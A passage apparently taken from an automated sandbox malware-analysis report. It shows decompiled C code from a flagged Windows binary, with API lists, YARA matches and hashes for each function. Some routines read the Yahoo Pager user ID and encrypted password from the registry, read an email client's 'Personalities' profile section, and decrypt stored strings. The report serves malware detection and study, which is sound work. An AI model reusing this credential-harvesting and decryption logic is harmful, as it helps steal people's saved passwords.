                                                                                							strcat(_t34, "  ");
                                                                                						}
                                                                                					}
                                                                                					strcat(_t34,  &_v260);
                                                                                					_t35 = _t35 + 1;
                                                                                				} while (_t35 < 0x80);
                                                                                				return _t34;
                                                                                			}










                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: strcat$memsetsprintf
                                                                                • String ID: %2.2X
                                                                                • API String ID: 582077193-791839006
                                                                                • Opcode ID: f03ef531f1dceed6107a024529effe878a92871925f9b5c2fb8bf99f2bcc600c
                                                                                • Instruction ID: 9ba21b13147b7bc42f3eaeb5b708c7057566a78b4f06b3a82068ff28b5e275af
                                                                                • Opcode Fuzzy Hash: f03ef531f1dceed6107a024529effe878a92871925f9b5c2fb8bf99f2bcc600c
                                                                                • Instruction Fuzzy Hash: 54014C7294421476D7315725ED03BEA379C9B84704F10407FF986A61C5EABCDBD48798
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 77%
                                                                                			E0040FEED(intOrPtr* __edi) {
                                                                                				void* __esi;
                                                                                				signed int _t9;
                                                                                				intOrPtr* _t16;
                                                                                				intOrPtr _t18;
                                                                                				intOrPtr _t19;
                                                                                				intOrPtr _t20;
                                                                                				intOrPtr _t21;
                                                                                				intOrPtr _t22;
                                                                                
                                                                                				_t16 = __edi;
                                                                                				_t9 =  *(__edi + 0x1c);
                                                                                				 *__edi = 0x414288;
                                                                                				if(_t9 != 0) {
                                                                                					_push(_t9);
                                                                                					L004115D6();
                                                                                					 *(__edi + 0x1c) =  *(__edi + 0x1c) & 0x00000000;
                                                                                				}
                                                                                				_t18 =  *((intOrPtr*)(_t16 + 0x460));
                                                                                				if(_t18 != 0) {
                                                                                					_t9 = E00406B5B(_t18);
                                                                                					_push(_t18);
                                                                                					L004115D6();
                                                                                				}
                                                                                				_t19 =  *((intOrPtr*)(_t16 + 0x45c));
                                                                                				if(_t19 != 0) {
                                                                                					_t9 = E00406B5B(_t19);
                                                                                					_push(_t19);
                                                                                					L004115D6();
                                                                                				}
                                                                                				_t20 =  *((intOrPtr*)(_t16 + 0x458));
                                                                                				if(_t20 != 0) {
                                                                                					_t9 = E00406B5B(_t20);
                                                                                					_push(_t20);
                                                                                					L004115D6();
                                                                                				}
                                                                                				_t21 =  *((intOrPtr*)(_t16 + 0x454));
                                                                                				if(_t21 != 0) {
                                                                                					_t9 = E00406A4E(_t21);
                                                                                					_push(_t21);
                                                                                					L004115D6();
                                                                                				}
                                                                                				_t22 =  *((intOrPtr*)(_t16 + 0x450));
                                                                                				if(_t22 != 0) {
                                                                                					_t9 = E00406A4E(_t22);
                                                                                					_push(_t22);
                                                                                					L004115D6();
                                                                                				}
                                                                                				return _t9;
                                                                                			}












                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ??3@
                                                                                • String ID:
                                                                                • API String ID: 613200358-0
                                                                                • Opcode ID: ea111159704be43e2a104ffdb8d509d36bb5885e2519feaa300ca6788f6abc2c
                                                                                • Instruction ID: b81094b12df4fb27198692459327ff2c1ceec6e662cd9000025ff3e54110b63d
                                                                                • Opcode Fuzzy Hash: ea111159704be43e2a104ffdb8d509d36bb5885e2519feaa300ca6788f6abc2c
                                                                                • Instruction Fuzzy Hash: B0015E72A029322AC5257B26680178AA3557F41B14B06013FFA0577B824F7C799246ED
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 44%
                                                                                			E0040173B(void* __ebx) {
                                                                                				struct tagRECT _v20;
                                                                                				struct tagPAINTSTRUCT _v84;
                                                                                
                                                                                				GetClientRect( *(__ebx + 0x10),  &_v20);
                                                                                				_v20.left = _v20.right - GetSystemMetrics(0x15);
                                                                                				_v20.top = _v20.bottom - GetSystemMetrics(0x14);
                                                                                				asm("movsd");
                                                                                				asm("movsd");
                                                                                				asm("movsd");
                                                                                				asm("movsd");
                                                                                				DrawFrameControl(BeginPaint( *(__ebx + 0x10),  &_v84),  &_v20, 3, 8);
                                                                                				return EndPaint( *(__ebx + 0x10),  &_v84);
                                                                                			}






                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                • String ID:
                                                                                • API String ID: 19018683-0
                                                                                • Opcode ID: 42458483af95651e2167a539795fde663e6d8f5d0ac71463485711cad55c201f
                                                                                • Instruction ID: a11a87b208587c0640a8feba78a21dda7633aea5bad1576310b301da0c27fea9
                                                                                • Opcode Fuzzy Hash: 42458483af95651e2167a539795fde663e6d8f5d0ac71463485711cad55c201f
                                                                                • Instruction Fuzzy Hash: B6014B72900218FFDF08DFA8DD489FE7BB9FB44301F004469EE11EA194DAB1AA14CB64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 96%
                                                                                			E00411366(signed int __edx, void* _a4, intOrPtr _a8, signed int* _a12, intOrPtr* _a16) {
                                                                                				signed int _v8;
                                                                                				char _v16;
                                                                                				char _v24;
                                                                                				char _v116;
                                                                                				void _v1156;
                                                                                				char _v1164;
                                                                                				void _v1171;
                                                                                				char _v1172;
                                                                                				char _v2188;
                                                                                				void _v2195;
                                                                                				void _v2196;
                                                                                				void _v3251;
                                                                                				void _v3252;
                                                                                				char _v4020;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				void* _t96;
                                                                                				char _t105;
                                                                                				intOrPtr _t112;
                                                                                				void* _t115;
                                                                                				signed int _t116;
                                                                                				int _t121;
                                                                                				signed int* _t122;
                                                                                				void* _t124;
                                                                                				void* _t125;
                                                                                				signed int _t128;
                                                                                				signed int* _t129;
                                                                                				void* _t132;
                                                                                
                                                                                				_t116 = __edx;
                                                                                				_t105 = 0;
                                                                                				_v2196 = 0;
                                                                                				memset( &_v2195, 0, 0x3ff);
                                                                                				_v3252 = 0;
                                                                                				memset( &_v3251, 0, 0x41e);
                                                                                				_v1172 = 0;
                                                                                				memset( &_v1171, 0, 0x41e);
                                                                                				_a8 = E00410E8A(_a8,  &_v2196);
                                                                                				_t121 = strlen(_a4);
                                                                                				if(_a8 > 8) {
                                                                                					_t137 = _t121;
                                                                                					if(_t121 > 0) {
                                                                                						memcpy( &_v3252, _a4, _t121);
                                                                                						memcpy(_t132 + _t121 - 0xcb0,  &_v2196, 8);
                                                                                						E0040BC49( &_v116);
                                                                                						_t19 = _t121 + 8; // 0x8
                                                                                						E0040BC6D(_t19,  &_v116,  &_v3252);
                                                                                						_t127 =  &_v116;
                                                                                						E0040BD0B(_t121,  &_v116,  &_v1172);
                                                                                						_t23 = _t121 + 8; // 0x8
                                                                                						memcpy( &_v1156,  &_v3252, _t23);
                                                                                						E0040BC49( &_v116);
                                                                                						_t27 = _t121 + 0x18; // 0x18
                                                                                						E0040BC6D(_t27, _t127,  &_v1172);
                                                                                						E0040BD0B(_t121, _t127,  &_v24);
                                                                                						E0040535A( &_v4020, _t137,  &_v1164,  &_v24);
                                                                                						_t122 = _a12;
                                                                                						E004053D6( &_v16,  &_v1172, _t122,  &_v4020);
                                                                                						_t112 = _a8;
                                                                                						_t128 = 0;
                                                                                						if(_t112 >= 0x18) {
                                                                                							_t37 = _t112 - 0x18; // -16
                                                                                							asm("cdq");
                                                                                							_t128 = (_t37 + (_t116 & 0x00000007) >> 3) + 1;
                                                                                						}
                                                                                						if(_t128 > _t105) {
                                                                                							_a4 =  &_v2188;
                                                                                							_t125 = _t122 + 8;
                                                                                							_v8 = _t128;
                                                                                							do {
                                                                                								E004053D6(_a4, _t112, _t125,  &_v4020);
                                                                                								_a4 = _a4 + 8;
                                                                                								_t125 = _t125 + 8;
                                                                                								_t45 =  &_v8;
                                                                                								 *_t45 = _v8 - 1;
                                                                                								_pop(_t112);
                                                                                							} while ( *_t45 != 0);
                                                                                							_t112 = _a8;
                                                                                						}
                                                                                						_t96 = 8 + _t128 * 8;
                                                                                						_t50 = _t96 + 8; // 0x8
                                                                                						if(_t50 > _t112) {
                                                                                							_t51 = _t112 - 8; // 0x0
                                                                                							_t96 = _t51;
                                                                                						}
                                                                                						if(_t96 > _t105) {
                                                                                							_t129 = _a12;
                                                                                							_t124 =  &_v2188 - _t129;
                                                                                							_t115 = _t96;
                                                                                							do {
                                                                                								 *_t129 =  *_t129 ^  *(_t124 + _t129);
                                                                                								_t129 =  &(_t129[0]);
                                                                                								_t115 = _t115 - 1;
                                                                                							} while (_t115 != 0);
                                                                                						}
                                                                                						 *((char*)(_t96 + _a12)) = _t105;
                                                                                						 *_a16 = 1;
                                                                                						_t105 = 1;
                                                                                					}
                                                                                				}
                                                                                				return _t105;
                                                                                 			}

                                                                                APIs
                                                                                • memset.MSVCRT ref: 00411387
                                                                                • memset.MSVCRT ref: 004113A0
                                                                                • memset.MSVCRT ref: 004113B4
                                                                                  • Part of subcall function 00410E8A: strlen.MSVCRT ref: 00410E97
                                                                                • strlen.MSVCRT ref: 004113D0
                                                                                • memcpy.MSVCRT ref: 004113F5
                                                                                • memcpy.MSVCRT ref: 0041140B
                                                                                  • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCFE
                                                                                  • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD2A
                                                                                  • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD40
                                                                                  • Part of subcall function 0040BD0B: memcpy.MSVCRT ref: 0040BD77
                                                                                  • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD81
                                                                                • memcpy.MSVCRT ref: 0041144B
                                                                                  • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCB0
                                                                                  • Part of subcall function 0040BC6D: memcpy.MSVCRT ref: 0040BCDA
                                                                                  • Part of subcall function 0040BD0B: memset.MSVCRT ref: 0040BD52
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: memcpymemset$strlen
                                                                                • String ID:
                                                                                • API String ID: 2142929671-0
                                                                                • Opcode ID: 0caf23c9b80619e2a6bbbc2ceb5d7559ea51fa806e827c69c16e75f74dc5ea3d
                                                                                • Instruction ID: c39f5f8930626063bf72b6da9320efac153577eb3bd573588316f9f93fa8d4dc
                                                                                • Opcode Fuzzy Hash: 0caf23c9b80619e2a6bbbc2ceb5d7559ea51fa806e827c69c16e75f74dc5ea3d
                                                                                • Instruction Fuzzy Hash: C4515C7290011DABCB10EF55CC819EEB7A9BF44308F5445BAE609A7151EB34AB898F94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 36%
                                                                                			E004078FF(signed short __ebx) {
                                                                                				signed int _t17;
                                                                                				void* _t18;
                                                                                				intOrPtr _t23;
                                                                                				void* _t31;
                                                                                				signed short _t39;
                                                                                				signed int _t40;
                                                                                				void* _t51;
                                                                                				int _t56;
                                                                                				void* _t57;
                                                                                				int _t67;
                                                                                
                                                                                				_t39 = __ebx;
                                                                                				if( *0x417540 == 0) {
                                                                                					E0040787D();
                                                                                				}
                                                                                				_t40 =  *0x417538;
                                                                                				_t17 = 0;
                                                                                				if(_t40 <= 0) {
                                                                                					L5:
                                                                                					_t51 = 0;
                                                                                				} else {
                                                                                					while(_t39 !=  *((intOrPtr*)( *0x417530 + _t17 * 4))) {
                                                                                						_t17 = _t17 + 1;
                                                                                						if(_t17 < _t40) {
                                                                                							continue;
                                                                                						} else {
                                                                                							goto L5;
                                                                                						}
                                                                                						goto L6;
                                                                                					}
                                                                                					_t51 =  *((intOrPtr*)( *0x417534 + _t17 * 4)) +  *0x417528;
                                                                                				}
                                                                                				L6:
                                                                                				if(_t51 != 0) {
                                                                                					L22:
                                                                                					_t18 = _t51;
                                                                                				} else {
                                                                                					if((_t39 & 0x00010000) == 0) {
                                                                                						if( *0x4171b8 == 0) {
                                                                                							_push( *0x417548 - 1);
                                                                                							_push( *0x41752c);
                                                                                							_push(_t39);
                                                                                							_push(E00407A55());
                                                                                							goto L16;
                                                                                						} else {
                                                                                							strcpy(0x4172c0, "strings");
                                                                                							_t31 = E00407D89(_t39,  *0x41752c);
                                                                                							_t57 = _t57 + 0x10;
                                                                                							if(_t31 == 0) {
                                                                                								L14:
                                                                                								_push( *0x417548 - 1);
                                                                                								_push( *0x41752c);
                                                                                								_push(_t39);
                                                                                								goto L9;
                                                                                							} else {
                                                                                								_t56 = strlen( *0x41752c);
                                                                                								if(_t56 == 0) {
                                                                                									goto L14;
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                					} else {
                                                                                						_push( *0x417548 - 1);
                                                                                						_push( *0x41752c);
                                                                                						_push(_t39 & 0x0000ffff);
                                                                                						L9:
                                                                                						_push( *0x416b94);
                                                                                						L16:
                                                                                						_t56 = LoadStringA();
                                                                                						_t67 = _t56;
                                                                                					}
                                                                                					if(_t67 <= 0) {
                                                                                						L21:
                                                                                						_t18 = 0x412466;
                                                                                					} else {
                                                                                						_t23 =  *0x41753c;
                                                                                						if(_t23 + _t56 + 2 >=  *0x417540 ||  *0x417538 >=  *0x417544) {
                                                                                							goto L21;
                                                                                						} else {
                                                                                							_t51 = _t23 +  *0x417528;
                                                                                							_t10 = _t56 + 1; // 0x1
                                                                                							memcpy(_t51,  *0x41752c, _t10);
                                                                                							 *((intOrPtr*)( *0x417534 +  *0x417538 * 4)) =  *0x41753c;
                                                                                							 *( *0x417530 +  *0x417538 * 4) = _t39;
                                                                                							 *0x417538 =  *0x417538 + 1;
                                                                                							 *0x41753c =  *0x41753c + _t56 + 1;
                                                                                							if(_t51 != 0) {
                                                                                								goto L22;
                                                                                							} else {
                                                                                								goto L21;
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				return _t18;
                                                                                 			}

                                                                                APIs
                                                                                • strcpy.MSVCRT(004172C0,strings,?,?,00408822,?,?,?,?,?,00000000,73B74DE0), ref: 0040797A
                                                                                  • Part of subcall function 00407D89: _itoa.MSVCRT ref: 00407DAA
                                                                                • strlen.MSVCRT ref: 00407998
                                                                                • LoadStringA.USER32 ref: 004079C8
                                                                                • memcpy.MSVCRT ref: 00407A07
                                                                                  • Part of subcall function 0040787D: ??2@YAPAXI@Z.MSVCRT ref: 004078A5
                                                                                  • Part of subcall function 0040787D: ??2@YAPAXI@Z.MSVCRT ref: 004078C3
                                                                                  • Part of subcall function 0040787D: ??2@YAPAXI@Z.MSVCRT ref: 004078E1
                                                                                  • Part of subcall function 0040787D: ??2@YAPAXI@Z.MSVCRT ref: 004078F1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ??2@$LoadString_itoamemcpystrcpystrlen
                                                                                • String ID: strings
                                                                                • API String ID: 1748916193-3030018805
                                                                                • Opcode ID: bf392a6dacac5d0c9eb1169d992c8844a823b81d6c84b2abf61d961779fc3ee1
                                                                                • Instruction ID: bfec9983b2359add980c5e43b0d452c2fda20e15e3ba6c634c10b5a9b6e313b6
                                                                                • Opcode Fuzzy Hash: bf392a6dacac5d0c9eb1169d992c8844a823b81d6c84b2abf61d961779fc3ee1
                                                                                • Instruction Fuzzy Hash: F73189B1A8C101BFD7159B59FD80DB63377EB84304710807AE902A7AB1E639B851CF9D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040329E(void* __fp0, intOrPtr _a4) {
                                                                                				int _v8;
                                                                                				char _v12;
                                                                                				char _v13;
                                                                                				char _v14;
                                                                                				char _v15;
                                                                                				void _v1035;
                                                                                				char _v1036;
                                                                                				char _v1968;
                                                                                				char _v2900;
                                                                                				void* __esi;
                                                                                				void* _t23;
                                                                                				int _t30;
                                                                                				char* _t31;
                                                                                				CHAR* _t49;
                                                                                				void* _t50;
                                                                                				void* _t55;
                                                                                
                                                                                				_t62 = __fp0;
                                                                                				_t49 = _a4 + 0xd2a;
                                                                                				if( *_t49 != 0) {
                                                                                					_t52 =  &_v1968;
                                                                                					E004021D8( &_v1968);
                                                                                					if(E0040314D(_t52, _t49, 0) != 0) {
                                                                                						E00402407(_t52, __fp0, _a4);
                                                                                					}
                                                                                					_v1036 = 0;
                                                                                					memset( &_v1035, 0, 0x400);
                                                                                					_t30 = GetPrivateProfileSectionA("Personalities",  &_v1036, 0x3fe, _t49);
                                                                                					if(_t30 <= 0) {
                                                                                						L11:
                                                                                						return _t30;
                                                                                					} else {
                                                                                						_v12 = 0;
                                                                                						_v13 = 0;
                                                                                						_v14 = 0;
                                                                                						_v15 = 0;
                                                                                						_t50 = 0;
                                                                                						_t31 =  &_v1036;
                                                                                						while(1) {
                                                                                							_t30 = strlen(_t31);
                                                                                							_v8 = _t30;
                                                                                							if(_t30 <= 0) {
                                                                                								goto L11;
                                                                                							}
                                                                                							_t54 =  &_v2900;
                                                                                							E004021D8( &_v2900);
                                                                                							if(strchr(_t55 + _t50 - 0x408, 0x3d) != 0 && E0040314D(_t54, _a4 + 0xd2a, _t34 + 1) != 0) {
                                                                                								E00402407(_t54, _t62, _a4);
                                                                                							}
                                                                                							_t30 = _v8;
                                                                                							_t50 = _t50 + _t30 + 1;
                                                                                							if(_t50 >= 0x3ff) {
                                                                                								goto L11;
                                                                                							} else {
                                                                                								_t31 = _t55 + _t50 - 0x408;
                                                                                								continue;
                                                                                							}
                                                                                						}
                                                                                						goto L11;
                                                                                					}
                                                                                				}
                                                                                				return _t23;
                                                                                			}




















                                                                                APIs
                                                                                  • Part of subcall function 0040314D: strchr.MSVCRT ref: 00403262
                                                                                • memset.MSVCRT ref: 004032F2
                                                                                • GetPrivateProfileSectionA.KERNEL32 ref: 0040330C
                                                                                • strchr.MSVCRT ref: 00403341
                                                                                  • Part of subcall function 00402407: _mbsicmp.MSVCRT ref: 0040243F
                                                                                • strlen.MSVCRT ref: 00403383
                                                                                  • Part of subcall function 00402407: _mbscmp.MSVCRT ref: 0040241B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                • String ID: Personalities
                                                                                • API String ID: 2103853322-4287407858
                                                                                • Opcode ID: e3fa63d939a05486987fea06324786367eab17663f8cebe7d255cc1b6eb769cc
                                                                                • Instruction ID: ece583472a64ba9cf1aca627ef0740b0f3020b1d2d3fce26046d940835a048de
                                                                                • Opcode Fuzzy Hash: e3fa63d939a05486987fea06324786367eab17663f8cebe7d255cc1b6eb769cc
                                                                                • Instruction Fuzzy Hash: 8C21BA72A00108AADB119F69DD81ADE7F6C9F50349F0040BBEA45F3181DA38EF86866D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00410F79(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
                                                                                				void* _v8;
                                                                                				void _v1031;
                                                                                				char _v1032;
                                                                                				void* __esi;
                                                                                				void* _t25;
                                                                                				int _t26;
                                                                                
                                                                                				_t25 = __ecx;
                                                                                				_t26 = 0;
                                                                                				_v1032 = 0;
                                                                                				memset( &_v1031, 0, 0x3ff);
                                                                                				if(E0040EB3F(0x80000001, "Software\\Yahoo\\Pager",  &_v8) == 0) {
                                                                                					if(E0040EB80(0x3ff, _t25, _v8, "Yahoo! User ID", _a4) == 0 && E0040EB80(0x3ff, _t25, _v8, "EOptions string",  &_v1032) == 0) {
                                                                                						_t26 = E004112A1(_t25, _a8, _a4,  &_v1032);
                                                                                					}
                                                                                					RegCloseKey(_v8);
                                                                                				}
                                                                                				return _t26;
                                                                                			}










                                                                                APIs
                                                                                • memset.MSVCRT ref: 00410F9B
                                                                                  • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                                  • Part of subcall function 0040EB80: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040EF11,?,?,?,?,0040EF11,00000000,?,?), ref: 0040EB9B
                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 00411007
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseOpenQueryValuememset
                                                                                • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                • API String ID: 1830152886-1703613266
                                                                                • Opcode ID: eea9cffd790e45d2014a53520a97df09f09eacd0c9e47dd03152d544afa7cf5a
                                                                                • Instruction ID: 4a1c6cf285358ebc60a306e6e4607d202acce7e44454db846991f846a9516d87
                                                                                • Opcode Fuzzy Hash: eea9cffd790e45d2014a53520a97df09f09eacd0c9e47dd03152d544afa7cf5a
                                                                                • Instruction Fuzzy Hash: 820184B5A00118BBDB10A6569D02FDE7A6C9B94399F004076FF08F2251E2389F95C698
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00405F41(long __eax, struct HWND__* _a4) {
                                                                                				char _v1028;
                                                                                				char _v2052;
                                                                                				void* __edi;
                                                                                				long _t15;
                                                                                
                                                                                				_t15 = __eax;
                                                                                				if(__eax == 0) {
                                                                                					_t15 = GetLastError();
                                                                                				}
                                                                                				E00405E46(_t15,  &_v1028);
                                                                                				sprintf( &_v2052, "Error %d: %s", _t15,  &_v1028);
                                                                                				return MessageBoxA(_a4,  &_v2052, "Error", 0x30);
                                                                                			}








                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLastMessagesprintf
                                                                                • String ID: Error$Error %d: %s
                                                                                • API String ID: 1670431679-1552265934
                                                                                • Opcode ID: 9a2ad0e70752bb447b178d956355c706b7f152369d8ca83d74a421e60f1b41e3
                                                                                • Instruction ID: dfdfd8ae3da356d4892d02c8fdfc7d0b76dc1d64d686e07e92b09a376f71314b
                                                                                • Opcode Fuzzy Hash: 9a2ad0e70752bb447b178d956355c706b7f152369d8ca83d74a421e60f1b41e3
                                                                                • Instruction Fuzzy Hash: 9BF0A7B640010876CB10A764DC05FDA76BCAB44704F1440B6BA05E2141EAB4DB458FAC
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 68%
                                                                                			E0040F037(intOrPtr _a4) {
                                                                                				_Unknown_base(*)()* _t3;
                                                                                				void* _t7;
                                                                                				struct HINSTANCE__* _t8;
                                                                                
                                                                                				_t7 = 0;
                                                                                				_t8 = LoadLibraryA("shlwapi.dll");
                                                                                				_t3 = GetProcAddress(_t8, "SHAutoComplete");
                                                                                				if(_t3 != 0) {
                                                                                					_t7 =  *_t3(_a4, 0x10000001);
                                                                                				}
                                                                                				FreeLibrary(_t8);
                                                                                				return _t7;
                                                                                			}







                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(shlwapi.dll,000003ED,745D48C0,00405C41,00000000), ref: 0040F040
                                                                                • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0040F04E
                                                                                • FreeLibrary.KERNEL32(00000000), ref: 0040F066
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Library$AddressFreeLoadProc
                                                                                • String ID: SHAutoComplete$shlwapi.dll
                                                                                • API String ID: 145871493-1506664499
                                                                                • Opcode ID: 00be263e50752a8f479fbc1a88640afc62a4183cc8ad6fe6345b1c509fc360a9
                                                                                • Instruction ID: e435a3077eadc7ffcc94e3fda903fcc6a6103b68d0c251917c13f6f883115a60
                                                                                • Opcode Fuzzy Hash: 00be263e50752a8f479fbc1a88640afc62a4183cc8ad6fe6345b1c509fc360a9
                                                                                • Instruction Fuzzy Hash: 70D0C2323002106B96605B326C0CAEB2D55EBC47527048032F505E1250EB648A86C1A8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 87%
                                                                                			E00407406(char* __eax, intOrPtr* _a4, char _a8) {
                                                                                				signed int _v8;
                                                                                				int _v12;
                                                                                				char* _v16;
                                                                                				char _v20;
                                                                                				signed int* _v24;
                                                                                				char _v28;
                                                                                				void _v284;
                                                                                				char _v540;
                                                                                				char _v1068;
                                                                                				void _v3115;
                                                                                				char _v3116;
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				signed int _t35;
                                                                                				signed int _t36;
                                                                                				signed int _t40;
                                                                                				signed int* _t61;
                                                                                				char _t69;
                                                                                				char* _t74;
                                                                                				char* _t75;
                                                                                				intOrPtr* _t76;
                                                                                				signed int _t78;
                                                                                				int _t80;
                                                                                				void* _t83;
                                                                                				void* _t84;
                                                                                				signed int _t89;
                                                                                
                                                                                				_t74 = __eax;
                                                                                				_t35 = strlen(__eax);
                                                                                				_t78 = _t35;
                                                                                				_t36 = _t35 & 0x80000001;
                                                                                				if(_t36 < 0) {
                                                                                					_t36 = (_t36 - 0x00000001 | 0xfffffffe) + 1;
                                                                                					_t89 = _t36;
                                                                                				}
                                                                                				if(_t89 != 0 || _t78 <= 0x20) {
                                                                                					return _t36;
                                                                                				} else {
                                                                                					_v3116 = 0;
                                                                                					memset( &_v3115, 0, 0x7ff);
                                                                                					_v8 = _v8 & 0x00000000;
                                                                                					_t61 = _a4 + 4;
                                                                                					_t40 =  *_t61 | 0x00000001;
                                                                                					if(_t78 <= 4) {
                                                                                						L7:
                                                                                						_t79 =  &_v1068;
                                                                                						E004046D7( &_v1068);
                                                                                						if(E004047A0( &_v1068, _t93) != 0) {
                                                                                							_v20 = _v8;
                                                                                							_v16 =  &_v3116;
                                                                                							_v28 = 0x10;
                                                                                							_v24 = _t61;
                                                                                							if(E00404811(_t79,  &_v20,  &_v28,  &_v12) != 0) {
                                                                                								_t80 = _v12;
                                                                                								if(_t80 > 0xff) {
                                                                                									_t80 = 0xff;
                                                                                								}
                                                                                								_v540 = 0;
                                                                                								_v284 = 0;
                                                                                								memcpy( &_v284, _v8, _t80);
                                                                                								_t27 =  &_a8; // 0x407626
                                                                                								_t75 =  &_v540;
                                                                                								 *((char*)(_t84 + _t80 - 0x118)) = 0;
                                                                                								E004060D0(0xff, _t75,  *_t27);
                                                                                								 *((intOrPtr*)( *_a4))(_t75);
                                                                                								LocalFree(_v8);
                                                                                							}
                                                                                						}
                                                                                						return E004047F1( &_v1068);
                                                                                					}
                                                                                					_t76 = _t74 + 5;
                                                                                					_t83 = (_t78 + 0xfffffffb >> 1) + 1;
                                                                                					do {
                                                                                						_t69 = ( *((intOrPtr*)(_t76 - 1)) - 0x00000001 << 0x00000004 |  *_t76 - 0x00000021) - _t40;
                                                                                						_t40 = _t40 * 0x10ff5;
                                                                                						_t76 = _t76 + 2;
                                                                                						_v8 = _v8 + 1;
                                                                                						_t83 = _t83 - 1;
                                                                                						_t93 = _t83;
                                                                                						 *((char*)(_t84 + _v8 - 0xc28)) = _t69;
                                                                                					} while (_t83 != 0);
                                                                                					goto L7;
                                                                                				}
                                                                                			}































                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.702728827.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000006.00000002.702744345.0000000000418000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeLocalmemcpymemsetstrlen
                                                                                • String ID: &v@
                                                                                • API String ID: 3110682361-3426253984
                                                                                • Opcode ID: 9a1ef4ca1be38dacd8a40183f10fd2ba3c83eed1e3cc7d309a54d2d6fc5753ae
                                                                                • Instruction ID: 0225f7a5d6cb17f6a7661d1d380ab710e59dbb599c3936da0c6da93344c8566d
                                                                                • Opcode Fuzzy Hash: 9a1ef4ca1be38dacd8a40183f10fd2ba3c83eed1e3cc7d309a54d2d6fc5753ae
